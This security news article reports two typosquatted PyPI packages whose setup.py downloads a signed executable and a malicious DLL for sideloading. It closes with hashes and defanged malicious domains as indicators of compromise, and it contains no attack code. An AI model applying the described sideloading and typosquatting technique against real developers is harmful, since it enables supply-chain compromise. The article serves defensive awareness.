Researchers have discovered that threat actors have been using open-source platforms and codes for several purposes, such as hosting C2 infrastructure, storing stolen data, and delivering second and third-stage downloaders or rootkit programs.
Two open-source PyPI packages were discovered to be utilized by threat actors for executing code via DLL sideloading attacks as a means of evading security monitoring tools.
The packages were identified as NP6HelperHttptest and NP6HelperHttper.
According to the reports shared with Cyber Security News, open-source ecosystems are most widely used by almost every developer, which does not have a reputation provider to assess the quality and reliability of the code.
Thus making it extremely simple and easier for threat actors to insert malicious codes into the repositories and perform supply chain attacks.
In addition to this, researchers discovered two attack types that are used in software supply chain attacks, namely typosquatting and repojacking.
The two malicious PyPI packages were involved in the Typosquatting attacks as the package names are identical to one of the legitimate NP6 packages.
Developers mostly ignore the spelling and consider the packages legitimate, proceeding to use them in development.
Once this is done, threat actors can pivot their ways into the organizations and perform malicious activities.
Both of the malicious PyPI packages consisted of a setup.py script that extends the setup tools command for downloading two other files: Comserver.exe and dgdeskband64.dll.
Comserver.exe is a legitimate file signed with a valid certificate from Beijing-based Kingsoft Corp, while dgdeskband64.dll is a malicious file that downloads further and runs a second-stage payload.
The Comserver.exe has the purpose of loading a library, dgdeskband64.dll, for invoking its exported function Dllinstall.
However, the dgdeskband64.dll malicious file inside the package is not the legitimate one expected from comserver.exe.
This custom-built dgdeskband64.dll by threat actors does the same Dllinstall export function under the disguise of the legitimate Dgdeskband64.dll library, resulting in a DLL sideloading attack.
This is done as a means of avoiding detection of the malicious code.
Moreover, execution of the malicious code is achieved by registering an exception handler inside the Dllinstall export function.
A second sample was also found, but it does not exploit DriverGenius’ ComServer.exe; instead, it uses a .exe and target DLL, windowsaccessbridge-64.dll.
However, the functionality of both the samples is similar, and the same URL downloads the same payload as the other PyPI packages.
package_name | version | SHA1 |
NP6HelperHttptest | 0.1 | 1fc236e94b54d3ddc4b2afb8d44a19abd7cf0dd4 |
NP6HelperHttptest | 0.2 | dfc8afe5cb7377380908064551c9555719fd28e3 |
NP6HelperHttptest | 0.3 | 73ece3d738777e791035e9c0c94bf4931baf3e3a |
NP6HelperHttptest | 0.4 | e3a7098e3352fdbb5ff5991e9e10dcf3b43b1b86 |
NP6HelperHttptest | 0.5 | 575bcc28998ad388c2ad2c2ebc74ba583f5c0065 |
NP6HelperHttptest | 0.6 | a1bb4531ce800515afa1357b633c73c27fa305cf |
NP6HelperHttper | 0.1 | a65bce340366f724d444978dcdcd877fa2cacb1c |
description | URI |
Domain that’s hosting the malicious dll | https://fus.rngupdatem[.]buzz |
Domain that’s hosting the shellcode payload | Us.archive-ubuntu.top |
name | type | SHA1 |
dgdeskband.dll | PE/dll | 1f9fcf86a56394a7267d85ba76c1256d12e3e76b |
windowsaccessbridge-64.dll | PE/dll | 84c75536b279a85a5320f058514b884a016bc8c8 |
an.gif | shellcode | 2dc80f45540d0a3ea33830848fcf529f98ea2f5e |
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…